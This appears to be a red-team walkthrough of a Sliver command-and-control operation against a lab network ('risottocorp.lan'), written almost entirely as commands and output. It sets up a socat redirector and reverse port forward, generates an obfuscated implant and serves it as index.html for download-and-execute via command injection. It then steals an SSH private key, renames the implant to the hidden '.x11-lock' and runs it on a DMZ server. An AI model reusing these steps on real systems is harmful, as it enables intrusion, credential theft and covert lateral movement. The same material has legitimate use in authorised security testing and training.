It takes a while, but you managed to provision a redirector and get a Sliver agent built and ready.
You provision a cloud server and authenticate to it with an SSH key. You then install SOCAT and bind to a port:
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# sudo socat tcp-listen:8443,reuseaddr,fork,bind=[server IP] tcp:127.0.0.1:4567Then, you open a reverse port forward from your Kali teamserver:
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:37:41] ssh -N -R 4567:localhost:8443 -i [ssh key] root@[cloud server IP][server] sliver > mtls --lhost 127.0.0.1 --lport 8443
[*] Starting mTLS listener ...
[server] sliver >
[*] Successfully started job #1
[server] sliver > generate --mtls [cloud host IP]:8443 --os linux
[*] Generating new linux/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:31
[*] Implant saved to /home/kali/Desktop/RICH_ALCOVEYou transfer this payload to new cloud host and host it in a web directory as index.html:
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:42:44] scp -i [ssh key] RICH_ALCOVE root@[cloud server IP]:~/
RICH_ALCOVE 100% 14MB 4.6MB/s 00:02
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# mkdir www
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# mv RICH_ALCOVE www
root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cd www/
root@ubuntu-s-1vcpu-1gb-nyc1-01:~/www# mv RICH_ALCOVE index.html
root@ubuntu-s-1vcpu-1gb-nyc1-01:~/www# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...You can now inject a command into the web application to download and execute the Sliver agent:
[*] Session d5d0d432 RICH_ALCOVE - 127.0.0.1:60646 (a747d8e29077) - linux/amd64 - Sun, 23 Oct 2022 16:50:21 EDT
[server] sliver > use d5d0d432-6cc1-42bf-bd6b-8a302d44da43
[*] Active session RICH_ALCOVE (d5d0d432-6cc1-42bf-bd6b-8a302d44da43)
[server] sliver (RICH_ALCOVE) > whoami
Logon ID: rootYou now have an authenticated, encrypted session established in the target network. The team rejoices! You download the SSH key securely via the Sliver agent’s mTLS communication channel:
[server] sliver (RICH_ALCOVE) > download /mnt/foo/home/risottoadmin/.ssh/id_rsa
[*] Wrote 2610 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/Desktop/id_rsaYou then use this key to copy and execute the Sliver agent onto the DMZ server.
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:53:27] chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:53:58] mv RICH_ALCOVE .x11-lock
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:54:12] scp -i id_rsa .x11-lock risottoadmin@dmz.risottocorp.lan:/tmp
The authenticity of host 'dmz.risottocorp.lan (10.10.1.152)' can't be established.
ED25519 key fingerprint is SHA256:AXU17FvZjCkmSljfCuy2nZ5ZYVCaMyr+uZdf+S6vHAU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:6: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'dmz.risottocorp.lan' (ED25519) to the list of known hosts.
.x11-lock
┌──(kali㉿kali)-[~/Desktop]
└─$ [10/23/22 4:55:24] ssh -i id_rsa risottoadmin@dmz.risottocorp.lan "/tmp/.x11-lock &"
[*] Session faf5c9b9 RICH_ALCOVE - 127.0.0.1:44312 (risotto-dmz) - linux/amd64 - Sun, 23 Oct 2022 16:56:21 EDT
[server] sliver (RICH_ALCOVE) > use faf5c9b9-2e30-474a-b323-f3f1142df44d
[*] Active session RICH_ALCOVE (faf5c9b9-2e30-474a-b323-f3f1142df44d)
[server] sliver (RICH_ALCOVE) > whoami
Logon ID: risottoadminSuccess! Your team congratulates you on your excellent find. Your team lead specifically calls out how carefully you handled the entire situation.